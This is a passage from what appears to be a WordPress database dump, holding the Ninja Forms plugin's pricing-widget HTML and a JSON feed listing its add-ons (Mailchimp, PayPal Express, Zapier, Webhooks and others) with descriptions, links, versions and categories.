&amp; Support</span></div>\r\n<div><i class=\"fa fa-plane\" aria-hidden=\"true\"></i>\r\n<span class=\"pricing-body-title\">Faster Support</span></div>\r\n<div><i class=\"fa fa-wrench\" aria-hidden=\"true\"></i>\r\n<span class=\"pricing-body-title\">Builder Pro Pack</span>\r\n<span>Layout &amp; Styles, Multi-Part Forms, Conditional Logic, File Uploads</span></div>\r\n<div><i class=\"fa fa-percent\" aria-hidden=\"true\"></i>\r\n<span>Plus <strong>40% off</strong>\r\nAdditional Add-Ons</span></div>\r\n</div>\r\n</div>\r\n<div class=\"pricing-block widget\">\r\n<div class=\"pricing-header\">\r\n<div class=\"pricing-title\">Personal</div>\r\n<div class=\"pricing-price\">$99</div>\r\n<div class=\"pricing-savings\">Save $57</div>\r\n<div class=\"pricing-cta\"><a class=\"nf-button primary\" href=\"https://ninjaforms.com/checkout/?edd_action=add_to_cart&download_id=471356&utm_medium=plugin&utm_source=Ninja+Forms+Plugin&utm_medium=Apps+and+Integrations&utm_campaign=Dashboard+Memberships&utm_content=Personal+Buy+Now\" target=\"_blank\" rel=\"noopener\">Buy Now</a></div>\r\n</div>\r\n<div class=\"pricing-body\">\r\n<div><i class=\"fa fa-user\" aria-hidden=\"true\"></i>\r\n<span class=\"pricing-body-title\">1 Site</span>\r\n<span>Updates &amp; Support</span></div>\r\n<div><i class=\"fa fa-car\" aria-hidden=\"true\"></i>\r\n<span class=\"pricing-body-title\">Fast Support</span></div>\r\n<div><i class=\"fa fa-wrench\" aria-hidden=\"true\"></i>\r\n<span class=\"pricing-body-title\">Builder Pro Pack</span>\r\n<span>Layout &amp; Styles, Multi-Part Forms, Conditional Logic, File Uploads</span></div>\r\n<div><i class=\"fa fa-percent\" aria-hidden=\"true\"></i>\r\n<span>Plus <strong>20% off</strong>\r\nAdditional Add-Ons</span></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"widget widget-plan-notice\">\r\n<p class=\"widget-title\">That sounds amazing! What else comes with Ninja Forms?</p>\r\n<a class=\"nf-button primary feature-list-link\" href=\"https://ninjaforms.com/features/?utm_source=Ninja+Forms+Plugin&utm_medium=Apps+and+Integrations&utm_campaign=Dashboard+Features+Link\" target=\"_blank\" rel=\"noopener\">We\'re glad you asked! Checkout our full list of features! <i class=\"fa fa-chevron-circle-right\" aria-hidden=\"true\"></i></a>\r\n<div><em>All plans include a 14 day money back guarantee.</em></div>\r\n<div>Requires a current active license and subject to our <a href=\"https://ninjaforms.com/terms-conditions/?utm_medium=plugin&utm_source=plugin-dashboard&utm_campaign=Ninja+Forms+Memberships&utm_content=Terms+Conditions\" target=\"_blank\" rel=\"noopener\">Terms &amp; Conditions</a>.</div>\r\n</div>','no'),(16682,'ninja_forms_addons_feed','[{\"title\":\"Multi Step Forms\",\"image\":\"assets\\/img\\/add-ons\\/multi-step-forms.png\",\"content\":\"Give submissions a boost on any longer form by making it a multi-page form. Drag and drop fields between pages, add breadcrumb navigation, a progress bar, and loads more!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/multi-step-forms\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Multi+Step+Forms\",\"plugin\":\"ninja-forms-multi-part\\/multi-part.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/multi-step-forms\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Multi+Step+Forms+Docs\",\"version\":\"3.0.26\",\"categories\":[{\"name\":\"Look &amp; Feel\",\"slug\":\"look-feel\"},{\"name\":\"Developer\",\"slug\":\"developer\"},{\"name\":\"User\",\"slug\":\"user\"},{\"name\":\"Business\",\"slug\":\"business\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Form Function and Design\",\"slug\":\"form-function-design\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Basic 2022\",\"slug\":\"basic-2022\"},{\"name\":\"Plus 2022\",\"slug\":\"plus-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Most Popular\",\"slug\":\"most-popular\"},{\"name\":\"Advanced Functionality\",\"slug\":\"advanced-functionality\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Plus 2023\",\"slug\":\"plus-2023\"},{\"name\":\"Pro 2023\",\"slug\":\"pro-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"Front-End Posting\",\"image\":\"assets\\/img\\/add-ons\\/front-end-posting.png\",\"content\":\"Let users publish content just by submitting a form! Completely configurable including post type, title, even categories and tags. Set post status, author, and much more!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/post-creation\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Front-End+Posting\",\"plugin\":\"ninja-forms-post-creation\\/ninja-forms-post-creation.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/post-creation\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Front-End+Posting+Docs\",\"version\":\"3.0.10\",\"categories\":[{\"name\":\"Content Management\",\"slug\":\"content-management\"},{\"name\":\"Developer\",\"slug\":\"developer\"},{\"name\":\"User\",\"slug\":\"user\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Manage Users\",\"slug\":\"user-management\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Advanced Functionality\",\"slug\":\"advanced-functionality\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"Mailchimp\",\"image\":\"assets\\/img\\/add-ons\\/mailchimp.png\",\"content\":\"Bring new life to your lists with upgraded Mailchimp signup forms for WordPress! Easy to build and customize with no code required. Link to lists and interest groups!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/mailchimp\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Mailchimp\",\"plugin\":\"ninja-forms-mail-chimp\\/ninja-forms-mail-chimp.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/mailchimp\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Mailchimp+Docs\",\"version\":\"3.3.6\",\"categories\":[{\"name\":\"Email Marketing\",\"slug\":\"email-marketing\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Business\",\"slug\":\"business\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Plus 2022\",\"slug\":\"plus-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Plus 2023\",\"slug\":\"plus-2023\"},{\"name\":\"Pro 2023\",\"slug\":\"pro-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"Campaign Monitor\",\"image\":\"assets\\/img\\/add-ons\\/campaign-monitor.png\",\"content\":\"Make any form a custom crafted WordPress signup form for Campaign Monitor. Connect to any list, link form fields to list fields, and watch your lists grow!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/campaign-monitor\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Campaign+Monitor\",\"plugin\":\"ninja-forms-campaign-monitor\\/ninja-forms-campaign-monitor.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/campaign-monitor\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Campaign+Monitor+Docs\",\"version\":\"3.0.6\",\"categories\":[{\"name\":\"Email Marketing\",\"slug\":\"email-marketing\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Plus 2022\",\"slug\":\"plus-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Plus 2023\",\"slug\":\"plus-2023\"},{\"name\":\"Pro 2023\",\"slug\":\"pro-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"User Analytics\",\"image\":\"assets\\/img\\/add-ons\\/user-analytics.png\",\"content\":\"Get better data on where your form traffic is coming from with every submission. Add 10 analytics fields including UTM source, medium, campaign, content, and more!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/user-analytics\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=User+Analytics\",\"plugin\":\"ninja-forms-user-analytics\\/ninja-forms-user-analytics.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/user-analytics\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=User+Analytics+Docs\",\"version\":\"3.0.3\",\"categories\":[{\"name\":\"Content Management\",\"slug\":\"content-management\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Manage Users\",\"slug\":\"user-management\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Advanced Functionality\",\"slug\":\"advanced-functionality\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"Constant Contact\",\"image\":\"assets\\/img\\/add-ons\\/constant-contact.png\",\"content\":\"Connect WordPress to Constant Contact with forms that you can build and design just the way you want, no tech skills required! Subscribe users to any list or interest group.\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/constant-contact\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Constant+Contact\",\"plugin\":\"ninja-forms-constant-contact\\/ninja-forms-constant-contact.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/constant-contact\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Constant+Contact+Docs\",\"version\":\"3.1.1\",\"categories\":[{\"name\":\"Email Marketing\",\"slug\":\"email-marketing\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Plus 2022\",\"slug\":\"plus-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Plus 2023\",\"slug\":\"plus-2023\"},{\"name\":\"Pro 2023\",\"slug\":\"pro-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"AWeber\",\"image\":\"assets\\/img\\/add-ons\\/aweber.png\",\"content\":\"Build your lists faster with easy to design, professional quality WordPress signup forms. No technical skills required. Connect WordPress to AWeber with style!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/aweber\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=AWeber\",\"plugin\":\"ninja-forms-aweber\\/ninja-forms-aweber.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/aweber\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=AWeber+Docs\",\"version\":\"3.2.1\",\"categories\":[{\"name\":\"Email Marketing\",\"slug\":\"email-marketing\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Plus 2023\",\"slug\":\"plus-2023\"},{\"name\":\"Pro 2023\",\"slug\":\"pro-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"PayPal Express\",\"image\":\"assets\\/img\\/add-ons\\/paypal-express.png\",\"content\":\"Set up any form to accept PayPal payments with PayPal Express for WordPress! Base totals on a fixed amount, user entered amount, or a calculated total.\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/paypal-express\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=PayPal+Express\",\"plugin\":\"ninja-forms-paypal-express\\/ninja-forms-paypal-express.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/paypal-express\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=PayPal+Express+Docs\",\"version\":\"3.1.3\",\"categories\":[{\"name\":\"Payment Gateways\",\"slug\":\"payment-gateways\"},{\"name\":\"Developer\",\"slug\":\"developer\"},{\"name\":\"User\",\"slug\":\"user\"},{\"name\":\"Business\",\"slug\":\"business\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Plus 2022\",\"slug\":\"plus-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Plus 2023\",\"slug\":\"plus-2023\"},{\"name\":\"Pro 2023\",\"slug\":\"pro-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"MailPoet\",\"image\":\"assets\\/img\\/add-ons\\/mailpoet.png\",\"content\":\"Say hello better! Customize your MailPoet signup forms to draw more subscribers than ever before. Connect WordPress to any MailPoet list in minutes!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/mailpoet\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=MailPoet\",\"plugin\":\"ninja-forms-mailpoet\\/nf-mailpoet.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/mailpoet\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=MailPoet+Docs\",\"version\":\"3.0.1\",\"categories\":[{\"name\":\"Email Marketing\",\"slug\":\"email-marketing\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Plus 2023\",\"slug\":\"plus-2023\"},{\"name\":\"Pro 2023\",\"slug\":\"pro-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"Zoho CRM\",\"image\":\"assets\\/img\\/add-ons\\/zoho-crm.png\",\"content\":\"Customize your forms to get the most out of your connection between WordPress and Zoho. Link form fields directly to Zoho fields, custom fields included, from almost any module.\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/zoho-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Zoho+CRM\",\"plugin\":\"ninja-forms-zoho-crm\\/ninja-forms-zoho-crm.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/zoho-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Zoho+CRM+Docs\",\"version\":\"3.5.0\",\"categories\":[{\"name\":\"CRM Integrations\",\"slug\":\"crm-integrations\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"CRMs\",\"slug\":\"crms\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Pro 2023\",\"slug\":\"pro-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"Capsule CRM\",\"image\":\"assets\\/img\\/add-ons\\/capsule-crm.png\",\"content\":\"Boost conversions from WordPress to Capsule with forms tailor made to your audience. Link form fields to Capsule fields from a wide range of modules. Custom fields too!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/capsule-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Capsule+CRM\",\"plugin\":\"ninja-forms-capsule-crm\\/ninja-forms-capsule-crm.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/capsule-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Capsule+CRM+Docs\",\"version\":\"3.4.4\",\"categories\":[{\"name\":\"CRM Integrations\",\"slug\":\"crm-integrations\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"CRMs\",\"slug\":\"crms\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"Insightly CRM\",\"image\":\"assets\\/img\\/add-ons\\/insightly-crm.png\",\"content\":\"Your customer\'s journey begins with your WordPress forms. Send Contacts, Leads, Opportunities, Custom fields and more seamlessly from WordPress to Insightly!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/insightly-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Insightly+CRM\",\"plugin\":\"ninja-forms-insightly-crm\\/ninja-forms-insightly-crm.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/insightly-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Insightly+CRM+Docs\",\"version\":\"3.2.1\",\"categories\":[{\"name\":\"CRM Integrations\",\"slug\":\"crm-integrations\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"CRMs\",\"slug\":\"crms\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"Trello\",\"image\":\"assets\\/img\\/add-ons\\/trello.png\",\"content\":\"Create a new Trello card with data from any WordPress form submission. Map fields to card details, assign members and labels, upload images, embed links.\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/trello\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Trello\",\"plugin\":\"ninja-forms-trello\\/ninja-forms-trello.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/trello\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Trello+Docs\",\"version\":\"3.0.4\",\"categories\":[{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Notification and Workflow\",\"slug\":\"notification-workflow\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Plus 2022\",\"slug\":\"plus-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Manage Submissions\",\"slug\":\"manage-submissions\"},{\"name\":\"Automation and Integration\",\"slug\":\"automation-and-integration\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Pro 2023\",\"slug\":\"pro-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"Elavon\",\"image\":\"assets\\/img\\/add-ons\\/elavon.png\",\"content\":\"Accept credit card payments from any of your WordPress forms. Pass customer and invoice info from any field securely into Elavon with each payment.\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/elavon\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Elavon\",\"plugin\":\"ninja-forms-elavon-payment-gateway\\/ninja-forms-elavon-payment-gateway.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/elavon\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Elavon+Docs\",\"version\":\"3.1.2\",\"categories\":[{\"name\":\"Payment Gateways\",\"slug\":\"payment-gateways\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Accept Payments\",\"slug\":\"accept-payments\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Pro 2023\",\"slug\":\"pro-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"Zapier\",\"image\":\"assets\\/img\\/add-ons\\/zapier.png\",\"content\":\"Don\'t see an add-on integration for a service you love? Don\'t worry! Connect WordPress to more than 4,000 different services through Zapier, no code required!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/zapier\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Zapier\",\"plugin\":\"ninja-forms-zapier\\/ninja-forms-zapier.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/zapier\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Zapier+Docs\",\"version\":\"3.0.9\",\"categories\":[{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"File Management\",\"slug\":\"file-management\"},{\"name\":\"Notification and Workflow\",\"slug\":\"notification-workflow\"},{\"name\":\"Custom Integrations\",\"slug\":\"custom-integrations\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Manage Submissions\",\"slug\":\"manage-submissions\"},{\"name\":\"Automation and Integration\",\"slug\":\"automation-and-integration\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Pro 2023\",\"slug\":\"pro-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"Salesforce CRM\",\"image\":\"assets\\/img\\/add-ons\\/salesforce-crm.png\",\"content\":\"Easily map any form field to any Salesforce Object or Field. A better connection to your customers begins with a better WordPress form builder!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/salesforce-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Salesforce+CRM\",\"plugin\":\"ninja-forms-salesforce-crm\\/ninja-forms-salesforce-crm.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/salesforce-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Salesforce+CRM+Docs\",\"version\":\"3.3.2\",\"categories\":[{\"name\":\"CRM Integrations\",\"slug\":\"crm-integrations\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"CRMs\",\"slug\":\"crms\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Pro 2023\",\"slug\":\"pro-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"Slack\",\"image\":\"assets\\/img\\/add-ons\\/slack.png\",\"content\":\"Get realtime Slack notifications in the workspace and channel of your choice with any new WordPress form submission. @Mention any team member!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/slack\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Slack\",\"plugin\":\"ninja-forms-slack\\/ninja-forms-slack.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/slack\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Slack+Docs\",\"version\":\"3.0.3\",\"categories\":[{\"name\":\"Notifications\",\"slug\":\"notifications\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Notification and Workflow\",\"slug\":\"notification-workflow\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Plus 2022\",\"slug\":\"plus-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Manage Submissions\",\"slug\":\"manage-submissions\"},{\"name\":\"Automation and Integration\",\"slug\":\"automation-and-integration\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Pro 2023\",\"slug\":\"pro-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"CleverReach\",\"image\":\"assets\\/img\\/add-ons\\/cleverreach.png\",\"content\":\"Grow the reach of your email marketing with better CleverReach signup forms. Tailor your forms to your audience with this easy to set up integration!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/cleverreach\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=CleverReach\",\"plugin\":\"ninja-forms-cleverreach\\/ninja-forms-cleverreach.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/cleverreach\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=CleverReach+Docs\",\"version\":\"3.1.6\",\"categories\":[{\"name\":\"Email Marketing\",\"slug\":\"email-marketing\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Plus 2023\",\"slug\":\"plus-2023\"},{\"name\":\"Pro 2023\",\"slug\":\"pro-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"Webhooks\",\"image\":\"assets\\/img\\/add-ons\\/webhooks.png\",\"content\":\"Can\'t find a WordPress integration for the service you love? Send WordPress forms data to any external URL using a simple GET or POST request!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/webhooks\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Webhooks\",\"plugin\":\"ninja-forms-webhooks\\/ninja-forms-webhooks.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/webhooks\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Webhooks+Docs\",\"version\":\"3.0.6\",\"categories\":[{\"name\":\"Notifications\",\"slug\":\"notifications\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Developer\",\"slug\":\"developer\"},{\"name\":\"User\",\"slug\":\"user\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Custom Integrations\",\"slug\":\"custom-integrations\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Automation and Integration\",\"slug\":\"automation-and-integration\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"Excel 